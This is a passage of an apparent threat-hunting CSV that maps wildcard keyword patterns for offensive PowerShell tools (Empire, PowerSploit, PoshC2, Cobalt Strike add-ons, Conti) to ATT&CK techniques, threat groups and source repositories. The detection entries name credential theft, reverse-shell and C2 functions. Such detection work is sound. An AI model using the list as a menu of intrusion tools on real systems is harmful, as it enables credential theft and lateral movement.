Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" +"*Invoke-RevShellServer.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Invoke-Rubeus*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-Rubeus*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-RunAs.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Invoke-RunasCs*","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","1","N/A","N/A","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" +"*Invoke-RunasCs*","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs/","1","1","N/A","6","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" +"*invoke-runaspayload*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Invoke-RunningProcessCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-S3ssionGoph3r*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-S4U-persistence.ps1*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" +"*Invoke-SafetyKatz*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SamBackupFilesCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Invoke-SauronEye*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SccmCacheFolderCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-ScheduledTasksCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Invoke-ScheduledTasksImagePermissionsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-ScheduledTasksUnquotedPathCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-SCMPermissionsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-ScriptSentry*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z" +"*Invoke-SCShell*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SDCLTBypass*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1130","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-SDPropagator*","offensive_tool_keyword","powershell","propagation of ACL changes on the 'AdminSDHolder' container. which can be used to maintain unauthorized access or escalate privileges in the targeted environment. The 'AdminSDHolder' container plays a crucial role in managing the security of protected groups in Active Directory. and forcing ACL changes to propagate may lead to unintended security consequences.","T1222","TA0003","N/A","N/A","Persistence","https://github.com/theyoge/AD-Pentesting-Tools/blob/main/Invoke-SDPropagator.ps1","1","1","N/A","N/A","1","57","10","2020-12-29T07:57:54Z","2020-10-14T05:01:51Z" +"*Invoke-Seatbelt*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-Seatbelt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-SendMail -Targets*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","0","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" +"*Invoke-SendReverseShell*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" +"*Invoke-SensitiveHiveFileAccessCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-SensitiveHiveShadowCopyCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-ServiceAbuse*","offensive_tool_keyword","AD exploitation cheat sheet","Exploit vulnerable service permissions (does not require touching disk)","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Invoke-ServiceAbuse*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-ServiceAbuse*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-Service-persistence.ps1*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" +"*Invoke-ServicesImagePermissionsCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Invoke-ServicesImagePermissionsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-ServicesPermissionsCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Invoke-ServicesPermissionsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-ServicesPermissionsRegistryCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Invoke-ServicesPermissionsRegistryCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-ServicesUnquotedPathCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Invoke-ServicesUnquotedPathCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-SessionGopher*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Invoke-SessionGopher*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-SessionGopher*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1061","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-SessionGopher*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-ShadowSpray*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*invoke-sharefinder *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*invokesharefinder*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" +"*Invoke-ShareFinder*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" +"*Invoke-ShareFinder*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Invoke-ShareFinder*","offensive_tool_keyword","Jira-Lens","finds (non-standard) shares on hosts in the local domain","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://powersploit.readthedocs.io/en/stable/Recon/README/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Invoke-ShareFinder*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration 